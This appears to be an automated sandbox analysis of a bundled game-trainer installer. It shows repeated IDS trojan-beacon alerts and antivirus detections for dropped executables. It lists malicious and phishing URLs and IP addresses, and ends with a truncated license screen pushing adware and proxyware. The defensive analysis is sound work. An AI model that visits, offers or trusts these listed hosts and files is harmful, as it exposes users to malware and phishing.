                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350283812046045 12/06/23-14:36:12.083206
                                  SID:2046045
                                  Source Port:50283
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5104.21.83.14550196802048093 12/06/23-14:35:05.393985
                                  SID:2048093
                                  Source Port:50196
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350320812046045 12/06/23-14:36:37.012244
                                  SID:2046045
                                  Source Port:50320
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350355812046045 12/06/23-14:37:01.752652
                                  SID:2046045
                                  Source Port:50355
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350308812046045 12/06/23-14:36:28.952581
                                  SID:2046045
                                  Source Port:50308
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350266812046045 12/06/23-14:36:00.860284
                                  SID:2046045
                                  Source Port:50266
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350294812046045 12/06/23-14:36:19.720749
                                  SID:2046045
                                  Source Port:50294
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350272812046045 12/06/23-14:36:04.780598
                                  SID:2046045
                                  Source Port:50272
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350325812046045 12/06/23-14:36:40.326068
                                  SID:2046045
                                  Source Port:50325
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350361812046045 12/06/23-14:37:06.857535
                                  SID:2046045
                                  Source Port:50361
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350331812046045 12/06/23-14:36:44.280145
                                  SID:2046045
                                  Source Port:50331
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350366812046045 12/06/23-14:37:10.126303
                                  SID:2046045
                                  Source Port:50366
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350277812046045 12/06/23-14:36:08.103794
                                  SID:2046045
                                  Source Port:50277
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350319812046045 12/06/23-14:36:36.357919
                                  SID:2046045
                                  Source Port:50319
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350299812046045 12/06/23-14:36:22.998701
                                  SID:2046045
                                  Source Port:50299
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350293812046045 12/06/23-14:36:19.055677
                                  SID:2046045
                                  Source Port:50293
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350336812046045 12/06/23-14:36:49.242148
                                  SID:2046045
                                  Source Port:50336
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350327812046045 12/06/23-14:36:41.646083
                                  SID:2046045
                                  Source Port:50327
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350284812046045 12/06/23-14:36:12.740748
                                  SID:2046045
                                  Source Port:50284
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350247812046045 12/06/23-14:35:48.186162
                                  SID:2046045
                                  Source Port:50247
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350275812046045 12/06/23-14:36:06.769942
                                  SID:2046045
                                  Source Port:50275
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350345812046045 12/06/23-14:36:55.159061
                                  SID:2046045
                                  Source Port:50345
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.537.1.198.25150187802839343 12/06/23-14:35:39.174213
                                  SID:2839343
                                  Source Port:50187
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:Potentially Bad Traffic
                                  Timestamp:192.168.2.577.105.136.350309812046045 12/06/23-14:36:29.696042
                                  SID:2046045
                                  Source Port:50309
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350250812046045 12/06/23-14:35:50.167908
                                  SID:2046045
                                  Source Port:50250
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350312812046045 12/06/23-14:36:31.744103
                                  SID:2046045
                                  Source Port:50312
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350303812046045 12/06/23-14:36:25.632684
                                  SID:2046045
                                  Source Port:50303
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350318812046045 12/06/23-14:36:35.709561
                                  SID:2046045
                                  Source Port:50318
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350321812046045 12/06/23-14:36:37.678957
                                  SID:2046045
                                  Source Port:50321
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350330812046045 12/06/23-14:36:43.615057
                                  SID:2046045
                                  Source Port:50330
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350251812046045 12/06/23-14:35:50.825474
                                  SID:2046045
                                  Source Port:50251
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350311812046045 12/06/23-14:36:31.045970
                                  SID:2046045
                                  Source Port:50311
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350257812046045 12/06/23-14:35:54.795722
                                  SID:2046045
                                  Source Port:50257
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350340812046045 12/06/23-14:36:51.889892
                                  SID:2046045
                                  Source Port:50340
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350274812046045 12/06/23-14:36:06.102370
                                  SID:2046045
                                  Source Port:50274
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350346812046045 12/06/23-14:36:55.814799
                                  SID:2046045
                                  Source Port:50346
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350363812046045 12/06/23-14:37:08.174720
                                  SID:2046045
                                  Source Port:50363
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350298812046045 12/06/23-14:36:22.345639
                                  SID:2046045
                                  Source Port:50298
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350364812046045 12/06/23-14:37:08.818539
                                  SID:2046045
                                  Source Port:50364
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350317812046045 12/06/23-14:36:35.040401
                                  SID:2046045
                                  Source Port:50317
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350322812046045 12/06/23-14:36:38.345066
                                  SID:2046045
                                  Source Port:50322
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350328812046045 12/06/23-14:36:42.306155
                                  SID:2046045
                                  Source Port:50328
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350256812046045 12/06/23-14:35:54.137806
                                  SID:2046045
                                  Source Port:50256
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.5104.21.52.22349705802047660 12/06/23-14:33:00.564607
                                  SID:2047660
                                  Source Port:49705
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350369812046045 12/06/23-14:37:12.112948
                                  SID:2046045
                                  Source Port:50369
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350292812046045 12/06/23-14:36:18.389256
                                  SID:2046045
                                  Source Port:50292
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350362812046045 12/06/23-14:37:07.522278
                                  SID:2046045
                                  Source Port:50362
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350365812046045 12/06/23-14:37:09.468071
                                  SID:2046045
                                  Source Port:50365
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350267812046045 12/06/23-14:36:01.508627
                                  SID:2046045
                                  Source Port:50267
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350359812046045 12/06/23-14:37:05.563977
                                  SID:2046045
                                  Source Port:50359
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350307812046045 12/06/23-14:36:28.273610
                                  SID:2046045
                                  Source Port:50307
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350276812046045 12/06/23-14:36:07.453180
                                  SID:2046045
                                  Source Port:50276
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350310812046045 12/06/23-14:36:30.384232
                                  SID:2046045
                                  Source Port:50310
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350313812046045 12/06/23-14:36:32.405793
                                  SID:2046045
                                  Source Port:50313
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350252812046045 12/06/23-14:35:51.486831
                                  SID:2046045
                                  Source Port:50252
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350341812046045 12/06/23-14:36:52.546584
                                  SID:2046045
                                  Source Port:50341
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350304812046045 12/06/23-14:36:26.286831
                                  SID:2046045
                                  Source Port:50304
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350335812046045 12/06/23-14:36:48.579507
                                  SID:2046045
                                  Source Port:50335
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350246812046045 12/06/23-14:35:47.521454
                                  SID:2046045
                                  Source Port:50246
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350329812046045 12/06/23-14:36:42.957751
                                  SID:2046045
                                  Source Port:50329
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350282812046045 12/06/23-14:36:11.427578
                                  SID:2046045
                                  Source Port:50282
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350356812046045 12/06/23-14:37:02.409479
                                  SID:2046045
                                  Source Port:50356
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350273812046045 12/06/23-14:36:05.431652
                                  SID:2046045
                                  Source Port:50273
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350254812046045 12/06/23-14:35:52.820317
                                  SID:2046045
                                  Source Port:50254
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350248812046045 12/06/23-14:35:48.865133
                                  SID:2046045
                                  Source Port:50248
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350289812046045 12/06/23-14:36:16.396787
                                  SID:2046045
                                  Source Port:50289
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350326812046045 12/06/23-14:36:40.988661
                                  SID:2046045
                                  Source Port:50326
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350332812046045 12/06/23-14:36:44.925833
                                  SID:2046045
                                  Source Port:50332
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350271812046045 12/06/23-14:36:04.130647
                                  SID:2046045
                                  Source Port:50271
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350360812046045 12/06/23-14:37:06.208022
                                  SID:2046045
                                  Source Port:50360
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350354812046045 12/06/23-14:37:01.103024
                                  SID:2046045
                                  Source Port:50354
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.537.1.198.25150133802839343 12/06/23-14:33:45.067270
                                  SID:2839343
                                  Source Port:50133
                                  Destination Port:80
                                  Protocol:TCP
                                  Classtype:Potentially Bad Traffic
                                  Timestamp:192.168.2.577.105.136.350265812046045 12/06/23-14:36:00.212175
                                  SID:2046045
                                  Source Port:50265
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350259812046045 12/06/23-14:35:56.113850
                                  SID:2046045
                                  Source Port:50259
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350348812046045 12/06/23-14:36:57.105195
                                  SID:2046045
                                  Source Port:50348
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350337812046045 12/06/23-14:36:49.902555
                                  SID:2046045
                                  Source Port:50337
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350295812046045 12/06/23-14:36:20.371059
                                  SID:2046045
                                  Source Port:50295
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350343812046045 12/06/23-14:36:53.852752
                                  SID:2046045
                                  Source Port:50343
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350260812046045 12/06/23-14:35:56.768169
                                  SID:2046045
                                  Source Port:50260
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected
                                  Timestamp:192.168.2.577.105.136.350302812046045 12/06/23-14:36:24.976708
                                  SID:2046045
                                  Source Port:50302
                                  Destination Port:81
                                  Protocol:TCP
                                  Classtype:A Network Trojan was detected

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: ZmWSzgevgt.exeAvira: detected
                                  Source: http://mysoftwareusa.info/stats/3/0/0Avira URL Cloud: Label: malware
                                  Source: https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598Avira URL Cloud: Label: malware
                                  Source: https://sizestep.online/tracker/thank_you.php?trk=2598Avira URL Cloud: Label: phishing
                                  Source: http://send.planewool.xyz/track_polos.php?tim=1701869569&rcc=US&c=2598&p=0.9Avira URL Cloud: Label: phishing
                                  Source: http://mysoftwareusa.info/archives/7Avira URL Cloud: Label: malware
                                  Source: http://mysoftwareusa.info/stats/3/1/0Avira URL Cloud: Label: malware
                                  Source: http://sparksteam.site/Avira URL Cloud: Label: malware
                                  Source: http://mysoftwareusa.info/archives/5Avira URL Cloud: Label: malware
                                  Source: https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7iAvira URL Cloud: Label: malware
                                  Source: http://sparksteam.site/QAvira URL Cloud: Label: malware
                                  Source: http://sparksteam.site/pill.phpSmAvira URL Cloud: Label: malware
                                  Source: http://send.planewool.xyz/track_uki.php?tim=1701869569&rcc=US&c=2598&p=0.92Avira URL Cloud: Label: phishing
                                  Source: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exeAvira: detection malicious, Label: PUA/Microleaves.A
                                  Source: 680b04.rbf (copy)ReversingLabs: Detection: 54%
                                  Source: C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exeReversingLabs: Detection: 44%
                                  Source: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exeReversingLabs: Detection: 54%
                                  Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\cd2f845e419388478df81bc59730a20b.tmpReversingLabs: Detection: 21%
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe.partReversingLabs: Detection: 26%
                                  Source: C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.partReversingLabs: Detection: 59%
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exeReversingLabs: Detection: 82%
                                  Source: C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a3.exeReversingLabs: Detection: 30%
                                  Source: C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Updater.exeReversingLabs: Detection: 65%
                                  Source: ZmWSzgevgt.exeReversingLabs: Detection: 29%
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2740 CreateFileW,GetLastError,CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,ReadFile,CryptHashData,GetLastError,CryptDestroyHash,CryptReleaseContext,CloseHandle,31_2_004F2740
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2600 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDestroyHash,CryptReleaseContext,31_2_004F2600
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2B40 GetLastError,CryptGetHashParam,GetLastError,GetLastError,CryptGetHashParam,GetLastError,GetLastError,CryptDestroyHash,31_2_004F2B40
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2C30 CryptDestroyHash,31_2_004F2C30
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2C90 CryptReleaseContext,31_2_004F2C90
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2CB0 CryptReleaseContext,31_2_004F2CB0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2D20 CryptDestroyHash,31_2_004F2D20
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004F2ED0 CryptReleaseContext,31_2_004F2ED0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FAED0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptReleaseContext,CryptHashData,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,GetLastError,CryptReleaseContext,CryptReleaseContext,31_2_004FAED0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FB1A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptReleaseContext,CryptHashData,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,GetLastError,CryptReleaseContext,CryptReleaseContext,31_2_004FB1A0
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FB520 CryptAcquireContextW,31_2_004FB520
                                  Source: C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exeCode function: 31_2_004FB6A0 CryptAcquireContextW,31_2_004FB6A0
                                  Source: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=5a096d9b-0b97-43de-80b2-162cb20ae6f0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220334BD64380C44E381F55025227D9087%22%7dHTTP Parser: Number of links: 0
                                  Source: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=5a096d9b-0b97-43de-80b2-162cb20ae6f0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220334BD64380C44E381F55025227D9087%22%7dHTTP Parser: Title: Redirecting does not match URL
                                  Source: https://www.bing.com/secure/Passport.aspx?popup=1&ssl=1HTTP Parser: No favicon
                                  Source: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=5a096d9b-0b97-43de-80b2-162cb20ae6f0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220334BD64380C44E381F55025227D9087%22%7dHTTP Parser: No favicon
                                  Source: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=5a096d9b-0b97-43de-80b2-162cb20ae6f0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220334BD64380C44E381F55025227D9087%22%7dHTTP Parser: No <meta name="author".. found
                                  Source: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=5a096d9b-0b97-43de-80b2-162cb20ae6f0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%220334BD64380C44E381F55025227D9087%22%7dHTTP Parser: No <meta name="copyright".. found
                                  Source: ZmWSzgevgt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                  Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpWindow detected: License AgreementPlease read the following important information before continuing.Please read the following License Agreement. You must accept the terms of this agreement before continuing with the installation.Welcome this is an important message and license agreement so please read all below carefully. river-city-rival-showdown-trainer-15-v1-8-.exe is financed by advertisement. By clicking Accept you will continue with the installation of river-city-rival-showdown-trainer-15-v1-8-.exe and the offers listed below.Inlog Browser is fast and secure web browser which does not collect your usage data.By clicking "Accept" I agree to the HYPERLINK "https://www.inlogbrowser.com/eula.txt"EULA HYPERLINK "https://www.inlogbrowser.com/pp.txt"Privacy Policy and consent to install Inlog Browser. This program can be removed at anytime in Windows Add/Remove Programs.your PC run like its brand new! Install Windows Manager the best utility for windows! Accept the HYPERLINK "https://advancedmanager.io/eula"EULA and HYPERLINK "https://advancedmanager.io/privacy-policy"Privacy Policy by pressing "Agree". A proxy service to protect your privacy. Accept the HYPERLINK "https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c4d0f3fabe"EULA by pressing "Agree". Optimized search feeds. By clicking "Accept" I agree to the HYPERLINK "http://www.thedownloadplanet.com/termsofuse"EULA and consent to install.an unparalleled gaming and browsing experience on mobile and desktop with OperaGX. Set limits on CPU RAM and Network usage use Discord & Twitch from the sidebar and connect mobile and desktop browsers with the file-sharing Flow feature. By clicking "Accept" I agree to the HYPERLINK "https://legal.opera.com/eula/computers/"EULA HYPERLINK "https://legal.opera.com/privacy/"Privacy Policy and consent to install.- Build a better digital experience with data-driven resultsLet us help your business optimize its performance perform more efficiently and maximize profit to make more strategically-guided decisions. By clicking "Accept" I agree to the HYPERLINK "https://staranalytics.io/EULA.html"EULA and consent to install.proceeding with the installation you agree to the HYPERLINK "https://digitalpulsedata.com/tos"EULA grant Digital Pulse permission to occasionally utilize the available resources of your device and IP address to retrieve public web data from the Internet. Digital Pulse highly regards your trust and prioritizes safeguarding your privacy and personal data. To ensure your safety Digital Pulse comprehends the security implications involved in sharing your IP address and diligently monitors all network traffic. Your IP address will solely be used for authorized business purposes and never for unauthorized ones. Rest assured that none of your personal information will be accessed or collected except for your IP address. This is a strict policy.I &accept the agreementI &do not accept the agreement&NextCancel
                                  Source: C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmpWindow detected: License AgreementPlease read the following important information before continuing.Please read the following License Agreement. You must accept the terms of this agreement before continuing with the installation.Welcome this is an important message and license agreement so please read all below carefully. river-city-rival-showdown-trainer-15-v1-8-.exe is financed by advertisement. By clicking Accept you will continue with the installation of river-city-rival-showdown-trainer-15-v1-8-.exe and the offers listed below.Inlog Browser is fast and secure web browser which does not collect your usage data.By clicking "Accept" I agree to the HYPERLINK "https://www.inlogbrowser.com/eula.txt"EULA HYPERLINK "https://www.inlogbrowser.com/pp.txt"Privacy Policy and consent to install Inlog Browser. This program can be removed at anytime in Windows Add/Remove Programs.your PC run like its brand new! Install Windows Manager the best utility for windows! Accept the HYPERLINK "https://advancedmanager.io/eula"EULA and HYPERLINK "https://advancedmanager.io/privacy-policy"Privacy Policy by pressing "Agree". A proxy service to protect your privacy. Accept the HYPERLINK "https://www.termsfeed.com/live/4bb495ca-d123-4f4d-a727-e9c4d0f3fabe"EULA by pressing "Agree". Optimized search feeds. By clicking "Accept" I agree to the HYPERLINK "http://www.thedownloadplanet.com/termsofuse"EULA and consent to install.an unparalleled gaming and browsing experience on mobile and desktop with OperaGX. Set limits on CPU RAM and Network usage use Discord & Twitch from the sidebar and connect mobile and desktop browsers with the file-sharing Flow feature. By clicking "Accept" I agree to the HYPERLINK "https://legal.opera.com/eula/computers/"EULA HYPERLINK "https://legal.opera.com/privacy/"Privacy Policy and consent to install.- Build a better digital experience with data-driven resultsLet us help your business optimize its performance perform more efficiently and maximize profit to make more strategically-guided decisions. By clicking "Accept" I agree to the HYPERLINK "https://staranalytics.io/EULA.html"EULA and consent to install.proceeding with the installation you agree to the HYPERLINK "https://digitalpulsedata.com/tos"EULA grant Digital Pulse permission to occasionally utilize the available resources of your device and IP address to retrieve public web data from the Internet. Digital Pulse highly regards your trust and prioritizes safeguarding your privacy 